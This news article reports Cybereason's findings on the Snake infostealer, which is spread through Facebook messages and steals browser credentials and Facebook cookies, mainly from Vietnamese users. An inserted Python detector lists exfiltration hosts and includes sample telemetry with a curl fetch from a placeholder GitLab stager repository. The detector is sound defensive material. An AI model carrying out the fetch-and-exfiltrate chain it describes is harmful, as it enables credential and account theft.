Facebook messages hijacked to steal personal info and details

New research has revealed that threat actors are leveraging Facebook messages to deploy a sophisticated Python-based infostealer known as Snake.

Researchers at Cybereason have shared details of the attack, indicating that Snake's primary objective is to capture sensitive information and credentials from unsuspecting users.

The campaign looks to be relatively new, having first been brought to light on X in August, and shows a bias towards Vietnamese victims.

Facebook infostealer targeting Vietnamese users

The attack uses seemingly harmless RAR or ZIP archives which, once opened, trigger an infection sequence involving two additional downloaders – a batch script and a cmd script. The cmd script is responsible for executing the Snake infostealer from an actor-controlled GitLab repository.

Cybereason has identified three distinct variants of the Snake infostealer – the third is an executable assembled by PyInstaller and targets users of the Coc Coc browser, suggesting a specific focus on Vietnamese users.

Once harvested, credentials and cookies are shared via numerous platforms, including Discord, GitHub, and Telegram.
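The staged chain described above (archive, batch script, cmd script, stager pulled from GitLab) and the exfiltration channels named here can be expressed as a small process-lineage detector. This is an added illustration, not Cybereason's or TechRadar's code; the event shape, the archive-tool and host lists, and the sample events are all constructed assumptions.

```python
"""Toy detector for the staged chain described above: archive -> .bat -> .cmd ->
stager fetched from GitLab -> loot posted to Discord/GitHub/Telegram.
Event shape, host lists and sample events are constructed for illustration."""
from dataclasses import dataclass, field

# Assumed lists; a real deployment would source these from its own telemetry.
ARCHIVE_TOOLS = {"winrar.exe", "7zfm.exe", "7zg.exe", "bandizip.exe"}
STAGER_HOSTS = {"gitlab.com"}
EXFIL_HOSTS = {"discord.com", "discordapp.com", "api.telegram.org", "api.github.com"}
SCRIPT_EXTS = (".bat", ".cmd")


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str                                  # lower-cased executable name
    cmdline: str
    dests: list = field(default_factory=list)   # hostnames contacted by this pid


def lineage(by_pid, pid):
    """Return [self, parent, grandparent, ...] images, stopping at unknown pids."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid].image)
        pid = by_pid[pid].ppid
    return chain


def detect(events):
    """Return sorted (pid, tag) findings for each stage of the chain."""
    by_pid = {e.pid: e for e in events}
    findings = set()
    for e in events:
        ancestors = lineage(by_pid, e.ppid)
        # Stage 1: cmd.exe running a .bat/.cmd whose ancestry includes an archive tool
        runs_script = e.image == "cmd.exe" and any(
            t.strip('"').lower().endswith(SCRIPT_EXTS) for t in e.cmdline.split())
        if runs_script and ARCHIVE_TOOLS & set(ancestors):
            findings.add((e.pid, "script-from-archive"))
        # Stage 2: something under the script chain fetches from the GitLab stager host
        if STAGER_HOSTS & set(e.dests) and "cmd.exe" in ancestors + [e.image]:
            findings.add((e.pid, "gitlab-stager-fetch"))
        # Stage 3: a Python interpreter under the script chain talks to an exfil channel
        if EXFIL_HOSTS & set(e.dests) and e.image.startswith("python") and "cmd.exe" in ancestors:
            findings.add((e.pid, "exfil-channel"))
    return sorted(findings)


SAMPLE_EVENTS = [  # constructed telemetry; paths and repo name are placeholders
    ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, "winrar.exe", 'WinRAR.exe "C:\\Users\\v\\Downloads\\Invoice.rar"'),
    ProcEvent(300, 200, "cmd.exe", 'cmd.exe /c "C:\\Users\\v\\AppData\\Local\\Temp\\setup.bat"'),
    ProcEvent(400, 300, "cmd.exe", 'cmd.exe /c "C:\\Users\\v\\AppData\\Local\\Temp\\run.cmd"'),
    ProcEvent(500, 400, "curl.exe", "curl.exe -o s.zip https://gitlab.com/EXAMPLE-REPO/s.zip", dests=["gitlab.com"]),
    ProcEvent(600, 400, "python.exe", "python.exe s.py", dests=["discord.com"]),
    ProcEvent(700, 100, "chrome.exe", "chrome.exe", dests=["gitlab.com", "discord.com"]),  # benign browsing
]
```

Ordinary browsing to gitlab.com or discord.com (pid 700) is not flagged because the lineage check ties each stage to the archive-spawned script chain.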

The malware also targets Facebook accounts by extracting cookie information, which could indicate a goal of hijacking accounts, potentially for malicious purposes.

The link to Vietnam is further reinforced by the naming conventions of the actor-controlled repositories, which allegedly reference the Vietnamese language in the source code.

Cybereason also noted that the malware targets other browsers used globally, including Brave, Chromium, Google Chrome Browser, Microsoft Edge, Mozilla Firefox, and Opera Web Browser.

The discovery comes amid increased scrutiny of Facebook for its perceived failure to assist victims of account takeovers.

TechRadar Pro has asked Meta to share information about how users can boost their protection against such attacks, and whether the company has any plans to prevent future attacks. In the meantime, users can follow best practices to help protect their accounts, including using complex passwords and two-factor authentication (2FA).
